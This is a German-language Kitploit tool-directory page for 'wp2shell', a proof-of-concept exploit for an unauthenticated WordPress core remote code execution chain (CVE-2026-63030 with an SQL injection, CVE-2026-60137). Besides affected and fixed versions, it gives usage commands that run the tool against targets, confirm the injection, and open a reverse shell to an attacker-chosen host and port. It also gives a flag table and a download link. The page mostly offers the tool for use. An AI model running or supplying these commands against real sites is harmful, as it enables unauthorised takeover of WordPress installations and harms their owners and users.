Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-63030 — PoC Exploit von WordPress Core Unauthenticated RCE bekannt als WP2Shell | Kitploit
Tools/GitHubGitHub/mverschu/cve-2026-63030
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and Control
GitHubmverschu/cve-2026-63030

CVE-2026-63030

PoC Exploit von WordPress Core Unauthenticated RCE bekannt als WP2Shell

Repository anzeigen
4111vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

wp2shell (CVE-2026-63030 / CVE-2026-60137)

Namewp2shell
CVEsCVE-2026-63030 (batch desync), CVE-2026-60137 (author__not_in SQLi)
BetroffenWordPress 6.9.0 bis 6.9.4, 7.0.0 bis 7.0.1
Behoben in6.9.5, 7.0.2
Authentifizierung erforderlichKeine
Gefunden vonAdam Kues (Searchlight Cyber / Assetnote)

Verwendung

Nur Host = automatisches Schema (versucht https:// dann http://). Verwende http:// oder https:// nur, wenn du eines erzwingen möchtest.

root@kitploit:~
# auto-detect scheme
wp2shell target.example
wp2shell 127.0.0.1:8080

# force a scheme
wp2shell https://target.example/
wp2shell http://127.0.0.1:8080/

# timing confirm
wp2shell target.example --confirm-sqli

# SQLi -> oEmbed/admin bridge -> plugin -> reverse shell
wp2shell target.example --shell
wp2shell target.example --shell 192.168.1.10 4443
FlagFunktion
--shell [LHOST [LPORT]]Standard-RCE-Kette; Standard-LHOST ist die IP dieses Rechners, LPORT ist 443
--rest-routeversuche zuerst /?rest_route=/batch/v1
--verify-tlsTLS-Zertifikate überprüfen (standardmäßig aus für Labor/selbstsigniert)
--proxy URLVerkehr über einen Proxy senden
--forceWordPress-Fingerprinting überspringen
Tool herunterladen